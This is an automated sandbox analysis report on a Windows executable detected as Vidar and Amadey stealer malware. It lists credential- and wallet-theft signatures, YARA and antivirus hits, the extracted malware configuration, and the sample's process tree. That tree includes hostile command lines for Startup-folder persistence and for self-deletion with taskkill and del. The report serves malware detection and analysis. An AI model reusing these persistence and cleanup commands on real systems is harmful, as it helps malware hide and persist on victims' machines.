Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report wKYTg7Gp6P.exe

Overview

General Information

Sample Name:wKYTg7Gp6P.exe
Analysis ID:399582
MD5:c4c7d74ca7c0fc1511a82b040a274549
SHA1:b0b1f42d887a07d4bfae6b1e63900bad822b0908
SHA256:84343112791c187d10af9cea8fac68cf4fc03d72352f1fe2def0bf72f9a9afc7
Tags:ArkeiStealerexe
Infos:

Most interesting Screenshot:

Detection

Amadey Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected Amadey bot
Yara detected Amadeys stealer DLL
Yara detected Vidar stealer
Contains functionality to inject code into remote processes
Creates an undocumented autostart registry key
Creates files in alternative data streams (ADS)
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for dropped file
Machine Learning detection for sample
Posts data to a JPG file (protocol mismatch)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file access)
Antivirus or Machine Learning detection for unpacked file
Contains capabilities to detect virtual machines
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Is looking for software installed on the system
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file contains strange resources
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Uses taskkill to terminate processes
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer

Classification

Startup

  • System is w10x64
  • wKYTg7Gp6P.exe (PID: 6924 cmdline: 'C:\Users\user\Desktop\wKYTg7Gp6P.exe' MD5: C4C7D74CA7C0FC1511A82B040A274549)
    • M7WCJ84VE5TXJ0R4.exe (PID: 6780 cmdline: 'C:\ProgramData\M7WCJ84VE5TXJ0R4.exe' MD5: 31AB82365078548DCEA62DA7C2380B2E)
      • blfte.exe (PID: 5756 cmdline: 'C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe' MD5: 31AB82365078548DCEA62DA7C2380B2E)
        • cmd.exe (PID: 6796 cmdline: 'C:\Windows\System32\cmd.exe' /C REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\e90e419c61\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 6820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • reg.exe (PID: 6828 cmdline: REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\e90e419c61\ MD5: CEE2A7E57DF2A159A065A34913A055C2)
        • rundll32.exe (PID: 6248 cmdline: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\1a9f26b569d5df\cred.dll, Main MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • rundll32.exe (PID: 1380 cmdline: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\1a9f26b569d5df\scr.dll, Main MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • cmd.exe (PID: 5732 cmdline: 'C:\Windows\System32\cmd.exe' /c taskkill /im wKYTg7Gp6P.exe /f & timeout /t 6 & del /f /q 'C:\Users\user\Desktop\wKYTg7Gp6P.exe' & del C:\ProgramData\*.dll & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 3028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • taskkill.exe (PID: 6068 cmdline: taskkill /im wKYTg7Gp6P.exe /f MD5: 15E2E0ACD891510C6268CB8899F2A1A1)
      • timeout.exe (PID: 5724 cmdline: timeout /t 6 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
  • cleanup

Malware Configuration

Threatname: Vidar

{"Config: ": ["00000000 -> Version: 38.6", "Date: Wed Apr 28 22:58:45 2021", "MachineID: d06ed635-68f6-4e9a-955c-4899f5f57b9a", "GUID: {e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}", "HWID: d06ed635-68f6-4e9a-955c-90ce-806e6f6e6963", "Path: C:\\Users\\user\\Desktop\\wKYTg7Gp6P.exe", "Work Dir: C:\\ProgramData\\CU50S1CYVL0A4WGXHOO1KFZGQ", "Windows: Windows 10 Pro [x64]", "Computer Name: 019635", "User Name: user", "Display Resolution: 1280x1024", "Display Language: en-US", "Keyboard Languages: English (United States)", "Local Time: 28/4/2021 22:58:45", "TimeZone: UTC1", "[Hardware]", "Processor: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz", "CPU Count: 4", "RAM: 8191 MB", "VideoCard: Microsoft Basic Display Adapter", "[Processes]", "---------- System [4]", "------------------------------  Registry [88]", "-  smss.exe [300]", "-  csrss.exe [400]", "-  wininit.exe [476]", "-  csrss.exe [488]", "-  services.exe [568]", "-  winlogon.exe [576]", "-  lsass.exe [592]", "-  fontdrvhost.exe [692]", "-  svchost.exe [712]", "-  fontdrvhost.exe [724]", "-  svchost.exe [800]", "-  svchost.exe [848]", "-  svchost.exe [888]", "-  dwm.exe [988]", "-  svchost.exe [340]", "-  svchost.exe [420]", "-  svchost.exe [396]", "-  svchost.exe [968]", "-  svchost.exe [1040]", "-  svchost.exe [1104]", "-  svchost.exe [1180]", "-  svchost.exe [1272]", "-  svchost.exe [1328]", "-  svchost.exe [1336]", "-  svchost.exe [1348]", "-  Memory Compression [1408]", "-  svchost.exe [1432]", "-  svchost.exe [1464]", "-  svchost.exe [1480]", "-  svchost.exe [1524]", "-  svchost.exe [1560]", "-  svchost.exe [1632]", "-  svchost.exe [1652]", "-  svchost.exe [1672]", "-  svchost.exe [1720]", "-  svchost.exe [1728]", "-  svchost.exe [1816]", "-  svchost.exe [1824]", "-  spoolsv.exe [1888]", "-  svchost.exe [1944]", "-  svchost.exe [2036]", "-  svchost.exe [1252]", "-  svchost.exe [1308]", "-  svchost.exe [2080]", "-  svchost.exe [2116]", "-  svchost.exe [2124]", "-  svchost.exe [2132]", "-  svchost.exe [2144]", "-  svchost.exe [2164]", "-  svchost.exe [2172]", "-  svchost.exe [2180]", "-  svchost.exe [2308]", "-  svchost.exe [2372]", "-  svchost.exe [2420]", "-  svchost.exe [2428]", "-  sihost.exe [3052]", "-  svchost.exe [2304]", "-  svchost.exe [2500]", "-  taskhostw.exe [3112]", "-  svchost.exe [3204]", "---------- ctfmon.exe [3284]", "-  explorer.exe [3424]", "-  smartscreen.exe [3516]", "-  svchost.exe [3676]", "-  dllhost.exe [3832]", "-  ShellExperienceHost.exe [4028]", "-  SearchUI.exe [3188]", "-  RuntimeBroker.exe [3656]", "-  RuntimeBroker.exe [4268]", "-  RuntimeBroker.exe [4772]", "-  WmiPrvSE.exe [5060]", "-  svchost.exe [4472]", "-  SgrmBroker.exe [4644]", "-  svchost.exe [4668]", "-  svchost.exe [3500]", "-  svchost.exe [4960]", "-  dllhost.exe [3564]", "-  ApplicationFrameHost.exe [4580]", "-  svchost.exe [160]", "-  audiodg.exe [2232]", "-  svchost.exe [2468]", "-  svchost.exe [4888]", "-  WMIADAP.exe [1620]", "-  WmiPrvSE.exe [500]", "-  WmiPrvSE.exe [2588]", "-  msiexec.exe [4184]", "-  svchost.exe [1504]", "-  svchost.exe [2856]", "-  svchost.exe [3408]", "-  DjaXdkqbRCmcGPJSmSfCjjO.exe [5176]", "-  DjaXdkqbRCmcGPJSmSfCjjO.exe [5204]", "-  DjaXdkqbRCmcGPJSmSfCjjO.exe [5216]", "-  DjaXdkqbRCmcGPJSmSfCjjO.exe [5232]", "-  DjaXdkqbRCmcGPJSmSfCjjO.exe [5240]", "-  DjaXdkqbRCmcGPJSmSfCjjO.exe [5252]", "-  DjaXdkqbRCmcGPJSmSfCjjO.exe [5260]", "-  DjaXdkqbRCmcGPJSmSfCjjO.exe [5268]", "-  DjaXdkqbRCmcGPJSmSfCjjO.exe [5276]", "-  DjaXdkqbRCmcGPJSmSfCjjO.exe [5288]", "-  DjaXdkqbRCmcGPJSmSfCjjO.exe [5296]", "-  DjaXdkqbRCmcGPJSmSfCjjO.exe [5304]", "-  DjaXdkqbRCmcGPJSmSfCjjO.exe [5316]", "-  DjaXdkqbRCmcGPJSmSfCjjO.exe [5324]", "-  DjaXdkqbRCmcGPJSmSfCjjO.exe [5332]", "-  DjaXdkqbRCmcGPJSmSfCjjO.exe [5344]", "-  DjaXdkqbRCmcGPJSmSfCjjO.exe [5352]", "-  DjaXdkqbRCmcGPJSmSfCjjO.exe [5360]", "-  DjaXdkqbRCmcGPJSmSfCjjO.exe [5376]", "-  DjaXdkqbRCmcGPJSmSfCjjO.exe [5384]", "-  DjaXdkqbRCmcGPJSmSfCjjO.exe [5392]", "-  svchost.exe [5664]", "-  wermgr.exe [5692]", "-  conhost.exe [5940]", "-  MusNotifyIcon.exe [6060]", "-  svchost.exe [6088]", "-  svchost.exe [2480]", "-  RuntimeBroker.exe [1848]", "-  UsoClient.exe [4500]", "-  UsoClient.exe [5908]", "-  svchost.exe [616]", "-  backgroundTaskHost.exe [1056]", "-  HxTsr.exe [2800]", "-  svchost.exe [4180]", "-  RuntimeBroker.exe [4284]", "-  RuntimeBroker.exe [6208]", "-  wKYTg7Gp6P.exe [6924]", "-  backgroundTaskHost.exe [7020]", "-  BackgroundTransferHost.exe [7084]", "[Software]", "Google Chrome [85.0.4183.121]", "Microsoft Office Professional Plus 2016 [16.0.4266.1001]", "Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 [12.0.30501.0]", "Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 [12.0.21005]", "Microsoft Visual C++ 2010  x86 Redistributable - 10.0.30319 [10.0.30319]", "Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.21.27702 [14.21.27702]", "Microsoft Visual C++ 2019 X86 Additional Runtime - 14.21.27702 [14.21.27702]", "Java 8 Update 211 [8.0.2110.12]", "Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 [11.0.61030.0]", "Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.21.27702 [14.21.27702.2]", "Java Auto Updater [2.8.211.12]", "Google Update Helper [1.3.35.451]", "Microsoft Office Professional Plus 2016 [16.0.4266.1001]", "Security Update for Microsoft Office 2016 (KB3114690) 32-Bit EditionUpdate for Microsoft Office 2016 (KB2920712) 32-Bit EditionUpdate for Microsoft Office 2016 (KB3141456) 32-Bit EditionUpdate for Microsoft Office 2016 (KB3115081) 32-Bit EditionUpdate for Microsoft Office 2016 (KB2920717) 32-Bit EditionUpdate for Microsoft Office 2016 (KB3114852) 32-Bit EditionUpdate for Microsoft Office 2016 (KB2920720) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4022161) 32-Bit EditionSecurity Update for Microsoft Office 2016 (KB3128012) 32-Bit EditionSecurity Update for Microsoft Word 2016 (KB4484300) 32-Bit EditionSecurity Update for Microsoft PowerPoint 2016 (KB4484246) 32-Bit EditionUpdate for Microsoft Office 2016 (KB3118263) 32-Bit EditionSecurity Update for Microsoft Office 2016 (KB4022176) 32-Bit EditionUpdate for Microsoft Office 2016 (KB3114528) 32-Bit EditionSecurity Update for Microsoft Visio 2016 (KB4484244) 32-Bit EditionSecurity Update for Microsoft Office 2016 (KB4484287) 32-Bit EditionUpdate for Microsoft Office 2016 (KB3118262) 32-Bit EditionUpdate for Skype for Business 2016 (KB4484286) 32-Bit EditionSecurity Update for Microsoft Office 2016 (KB4484214) 32-Bit EditionSecurity Update for Microsoft Office 2016 (KB4011574) 32-Bit EditionUpdate for Microsoft Office 2016 (KB3213650) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4462119) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4032236) 32-Bit EditionSecurity Update for Microsoft Office 2016 (KB3085538) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4484138) 32-Bit EditionDefinition Update for Microsoft Office 2016 (KB3115407) 32-Bit EditionUpdate for Microsoft Office 2016 (KB2920678) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4475580) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4484248) 32-Bit EditionSecurity Update for Microsoft Excel 2016 (KB4484273) 32-Bit EditionSecurity Update for Microsoft Publisher 2016 (KB4011097) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4464586) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4464538) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4461435) 32-Bit EditionSecurity Update for Microsoft Outlook 2016 (KB4484274) 32-Bit EditionSecurity Update for Microsoft Project 2016 (KB4484269) 32-Bit EditionUpdate for Microsoft Office 2016 (KB3191929) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4011259) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4464535) 32-Bit EditionSecurity Update for Microsoft Office 2016 (KB2920727) 32-Bit EditionUpdate for Microsoft Office 2016 (KB3114903) 32-Bit EditionUpdate for Microsoft Office 2016 (KB2920724) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4484101) 32-Bit EditionUpdate for Microsoft Office 2016 (KB3118264) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4011629) 32-Bit EditionSecurity Update for Microsoft Access 2016 (KB4484167) 32-Bit EditionUpdate for Microsoft OneDrive for Business (KB4022219) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4032254) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4011225) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4484106) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4022193) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4011634) 32-Bit EditionSecurity Update for Microsoft Office 2016 (KB4484258) 32-Bit EditionUpdate for Microsoft Office 2016 (KB3178666) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4011669) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4475588) 32-Bit EditionUpdate for Microsoft OneNote 2016 (KB4475586) 32-Bit EditionSecurity Update for Microsoft Office 2016 (KB3213551) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4484145) 32-Bit EditionUpdate for Microsoft Office 2016 (KB3115276) 32-Bit EditionMicrosoft Access MUI (English) 2016 [16.0.4266.1001]", "Microsoft Excel MUI (English) 2016 [16.0.4266.1001]", "Security Update for Microsoft Excel 2016 (KB4484273) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4011629) 32-Bit EditionMicrosoft PowerPoint MUI (English) 2016 [16.0.4266.1001]", "Security Update for Microsoft PowerPoint 2016 (KB4484246) 32-Bit EditionSecurity Update for Microsoft Excel 2016 (KB4484273) 32-Bit EditionMicrosoft Publisher MUI (English) 2016 [16.0.4266.1001]", "Security Update for Microsoft Publisher 2016 (KB4011097) 32-Bit EditionMicrosoft Outlook MUI (English) 2016 [16.0.4266.1001]", "Security Update for Microsoft Word 2016 (KB4484300) 32-Bit EditionSecurity Update for Microsoft Outlook 2016 (KB4484274) 32-Bit EditionMicrosoft Word MUI (English) 2016 [16.0.4266.1001]", "Security Update for Microsoft Word 2016 (KB4484300) 32-Bit EditionSecurity Update for Microsoft Excel 2016 (KB4484273) 32-Bit EditionMicrosoft Office Proofing Tools 2016 - English [16.0.4266.1001]", "Update for Microsoft Office 2016 (KB4464538) 32-Bit EditionOutils de v", "00002601 -> rification linguistique 2016 de Microsoft Office", "00002632 -> - Fran", "00002639 -> ais [16.0.4266.1001]", "Update for Microsoft Office 2016 (KB4464538) 32-Bit EditionHerramientas de correcci", "000026a3 -> n de Microsoft Office 2016: espa", "000026c4 -> ol [16.0.4266.1001]", "Update for Microsoft Office 2016 (KB4464538) 32-Bit EditionUpdate for Microsoft Office 2016 (KB3114528) 32-Bit EditionUpdate for Skype for Business 2016 (KB4484286) 32-Bit EditionUpdate for Microsoft Office 2016 (KB3213650) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4462119) 32-Bit EditionSecurity Update for Microsoft Office 2016 (KB3085538) 32-Bit EditionSecurity Update for Microsoft Office 2016 (KB4022162) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4484248) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4464586) 32-Bit EditionSecurity Update for Microsoft Project 2016 (KB4484269) 32-Bit EditionUpdate for Microsoft OneDrive for Business (KB4022219) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4484106) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4011634) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4475588) 32-Bit EditionUpdate for Microsoft OneNote 2016 (KB4475586) 32-Bit EditionUpdate for Microsoft OneDrive for Business (KB4022219) 32-Bit EditionMicrosoft Office Proofing (English) 2016 [16.0.4266.1001]", "Microsoft InfoPath MUI (English) 2016 [16.0.4266.1001]", "Microsoft Office Shared MUI (English) 2016 [16.0.4266.1001]", "Security Update for Microsoft Office 2016 (KB4022176) 32-Bit EditionSecurity Update for Microsoft Office 2016 (KB4484214) 32-Bit EditionSecurity Update for Microsoft Office 2016 (KB4011574) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4475580) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4484106) 32-Bit EditionSecurity Update for Microsoft Office 2016 (KB3213551) 32-Bit EditionMicrosoft DCF MUI (English) 2016 [16.0.4266.1001]", "Microsoft OneNote MUI (English) 2016 [16.0.4266.1001]", "Update for Microsoft OneNote 2016 (KB4475586) 32-Bit EditionMicrosoft Groove MUI (English) 2016 [16.0.4266.1001]", "Update for Microsoft OneDrive for Business (KB4022219) 32-Bit EditionMicrosoft Office OSM MUI (English) 2016 [16.0.4266.1001]", "Microsoft Office OSM UX MUI (English) 2016 [16.0.4266.1001]", "Microsoft Office Shared Setup Metadata MUI (English) 2016 [16.0.4266.1001]", "Microsoft Access Setup Metadata MUI (English) 2016 [16.0.4266.1001]", "Microsoft Skype for Business MUI (English) 2016 [16.0.4266.1001]", "Security Update for Microsoft Word 2016 (KB4484300) 32-Bit EditionUpdate for Skype for Business 2016 (KB4484286) 32-Bit EditionAdobe Refresh Manager [1.8.0]", "Adobe Acrobat Reader DC [19.012.20035]", "Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 [11.0.61030]", "Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 [11.0.61030]", "Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 [11.0.61030.0]", "Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.21.27702 [14.21.27702.2]", "Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 [12.0.30501.0]", "Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 [12.0.21005]"]}

Yara Overview

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AmadeyYara detected Amadey botJoe Security
    dump.pcapJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\ProgramData\1a9f26b569d5df\cred.dllJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cred[1].dllJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000000.00000003.659819807.0000000002250000.00000004.00000001.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
            0000000A.00000002.923993621.00000000006DF000.00000004.00000001.sdmpJoeSecurity_AmadeyYara detected Amadey botJoe Security
              00000000.00000002.700376910.0000000002180000.00000040.00000001.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                  Process Memory Space: wKYTg7Gp6P.exe PID: 6924JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    Click to see the 2 entries

                    Unpacked PEs

                    SourceRuleDescriptionAuthorStrings
                    0.2.wKYTg7Gp6P.exe.400000.0.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                      0.3.wKYTg7Gp6P.exe.2250000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                        0.3.wKYTg7Gp6P.exe.2250000.0.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                          0.2.wKYTg7Gp6P.exe.400000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                            0.2.wKYTg7Gp6P.exe.2180e50.1.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                              Click to see the 1 entries

                              Sigma Overview

                              No Sigma rule has matched

                              Signature Overview

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection:

                              barindex
                              Antivirus detection for dropped fileShow sources
                              Source: C:\ProgramData\1a9f26b569d5df\cred.dllAvira: detection malicious, Label: HEUR/AGEN.1137247
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cred[1].dllAvira: detection malicious, Label: HEUR/AGEN.1137247
                              Source: C:\ProgramData\1a9f26b569d5df\scr.dllAvira: detection malicious, Label: HEUR/AGEN.1136939
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\scr[1].dllAvira: detection malicious, Label: HEUR/AGEN.1136939
                              Found malware configurationShow sources
                              Source: information.txt.0.dr.binstrMalware Configuration Extractor: Vidar {"Config: ": ["00000000 -> Version: 38.6", "Date: Wed Apr 28 22:58:45 2021", "MachineID: d06ed635-68f6-4e9a-955c-4899f5f57b9a", "GUID: {e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}", "HWID: d06ed635-68f6-4e9a-955c-90ce-806e6f6e6963", "Path: C:\\Users\\user\\Desktop\\wKYTg7Gp6P.exe", "Work Dir: C:\\ProgramData\\CU50S1CYVL0A4WGXHOO1KFZGQ", "Windows: Windows 10 Pro [x64]", "Computer Name: 019635", "User Name: user", "Display Resolution: 1280x1024", "Display Language: en-US", "Keyboard Languages: English (United States)", "Local Time: 28/4/2021 22:58:45", "TimeZone: UTC1", "[Hardware]", "Processor: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz", "CPU Count: 4", "RAM: 8191 MB", "VideoCard: Microsoft Basic Display Adapter", "[Processes]", "---------- System [4]", "------------------------------ Registry [88]", "- smss.exe [300]", "- csrss.exe [400]", "- wininit.exe [476]", "- csrss.exe [488]", "- services.exe [568]", "- winlogon.exe [576]", "- lsass.exe [592]", "- fontdrvhost.exe [692]", "- svchost.exe [712]", "- fontdrvhost.exe [724]", "- svchost.exe [800]", "- svchost.exe [848]", "- svchost.exe [888]", "- dwm.exe [988]", "- svchost.exe [340]", "- svchost.exe [420]", "- svchost.exe [396]", "- svchost.exe [968]", "- svchost.exe [1040]", "- svchost.exe [1104]", "- svchost.exe [1180]", "- svchost.exe [1272]", "- svchost.exe [1328]", "- svchost.exe [1336]", "- svchost.exe [1348]", "- Memory Compression [1408]", "- svchost.exe [1432]", "- svchost.exe [1464]", "- svchost.exe [1480]", "- svchost.exe [1524]", "- svchost.exe [1560]", "- svchost.exe [1632]", "- svchost.exe [1652]", "- svchost.exe [1672]", "- svchost.exe [1720]", "- svchost.exe [1728]", "- svchost.exe [1816]", "- svchost.exe [1824]", "- spoolsv.exe [1888]", "- svchost.exe [1944]", "- svchost.exe [2036]", "- svchost.exe [1252]", "- svchost.exe [1308]", "- svchost.exe [2080]", "- svchost.exe [2116]", "- svchost.exe [2124]", "- svchost.exe [2132]", "- svchost.exe [2144]", "- svchost.exe [2164]", "- svchost.exe [2172]", "- svchost.exe [2180]", "- svchost.exe [2308]", "- svchost.exe [2372]", "- svchost.exe [2420]", "- svchost.exe [2428]", "- sihost.exe [3052]", "- svchost.exe [2304]", "- svchost.exe [2500]", "- taskhostw.exe [3112]", "- svchost.exe [3204]", "---------- ctfmon.exe [3284]", "- explorer.exe [3424]", "- smartscreen.exe [3516]", "- svchost.exe [3676]", "- dllhost.exe [3832]", "- ShellExperienceHost.exe [4028]", "- SearchUI.exe [3188]", "- RuntimeBroker.exe [3656]", "- RuntimeBroker.exe [4268]", "- RuntimeBroker.exe [4772]", "- WmiPrvSE.exe [5060]", "- svchost.exe [4472]", "- SgrmBroker.exe [4644]", "- svchost.exe [4668]", "- svchost.exe [3500]", "- svchost.exe [4960]", "- dllhost.exe [3564]", "- ApplicationFrameHost.exe [4580]", "- svchost.exe [160]", "- audiodg.exe [2232]", "- svchost.exe [2468]", "- svchost.exe [4888]", "- WMIADAP.exe [1620]", "- WmiPrvSE.exe [500]", "- WmiPrvSE.exe [2588]", "- msiexec.exe [
                              Multi AV Scanner detection for dropped fileShow sources
                              Source: C:\ProgramData\1a9f26b569d5df\cred.dllReversingLabs: Detection: 82%
                              Source: C:\ProgramData\1a9f26b569d5df\scr.dllReversingLabs: Detection: 82%
                              Multi AV Scanner detection for submitted fileShow sources
                              Source: wKYTg7Gp6P.exeVirustotal: Detection: 48%Perma Link
                              Source: wKYTg7Gp6P.exeReversingLabs: Detection: 58%
                              Machine Learning detection for dropped fileShow sources
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\xsrv2[1].exeJoe Sandbox ML: detected
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exeJoe Sandbox ML: detected
                              Machine Learning detection for sampleShow sources
                              Source: wKYTg7Gp6P.exeJoe Sandbox ML: detected
                              Source: 0.3.wKYTg7Gp6P.exe.2250000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                              Source: 0.2.wKYTg7Gp6P.exe.2180e50.1.unpackAvira: Label: TR/Patched.Ren.Gen
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeCode function: 0_2_0040B708 CryptUnprotectData,LocalAlloc,_memmove,LocalFree,0_2_0040B708

                              Compliance:

                              barindex
                              Detected unpacking (overwrites its own PE header)Show sources
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeUnpacked PE file: 0.2.wKYTg7Gp6P.exe.400000.0.unpack
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exeUnpacked PE file: 5.2.M7WCJ84VE5TXJ0R4.exe.400000.0.unpack
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeUnpacked PE file: 10.2.blfte.exe.400000.0.unpack
                              Source: wKYTg7Gp6P.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                              Source: unknownHTTPS traffic detected: 104.17.63.50:443 -> 192.168.2.4:49733 version: TLS 1.2
                              Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3[1].dll.0.dr
                              Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3[1].dll.0.dr
                              Source: Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.0.dr
                              Source: Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.0.dr
                              Source: Binary string: D:\Mktmp\NL1\Release\NL1.pdb source: M7WCJ84VE5TXJ0R4.exe, blfte.exe
                              Source: Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.0.dr
                              Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: mozglue[1].dll.0.dr
                              Source: Binary string: UC:\kinukuconuwukuwok24_motowubidanagosumozi_dibiciyixaho-pow.pdbpdb source: wKYTg7Gp6P.exe, 00000000.00000003.684695927.0000000002CA4000.00000004.00000001.sdmp, M7WCJ84VE5TXJ0R4.exe, 00000005.00000000.695429336.0000000000415000.00000002.00020000.sdmp, blfte.exe, 0000000A.00000000.708934344.0000000000415000.00000002.00020000.sdmp, blfte.exe.5.dr
